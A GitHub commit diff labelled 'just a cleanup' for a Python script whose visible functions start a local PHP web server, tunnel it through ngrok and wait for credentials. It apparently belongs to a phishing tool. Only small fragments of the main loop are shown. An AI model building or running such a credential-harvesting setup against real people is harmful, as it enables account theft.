just a cleanup

This commit is contained in:
Usama Abdul Sattar 2018-09-23 13:58:15 +05:00 committed by GitHub
parent bd2a17dafb
commit 72a8cb16ce
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -320,12 +320,7 @@ def runNgrok():
def runServer():
system("cd Server/www/ && php -S 127.0.0.1:1111 > /dev/null 2>&1 &")
if __name__ == "__main__":
try:
runPEnv()
@ -342,13 +337,7 @@ if __name__ == "__main__":
return server()
server()
multiprocessing.Process(target=runServer).start()
waitCreds()
waitCreds()
except KeyboardInterrupt:
if didBackground: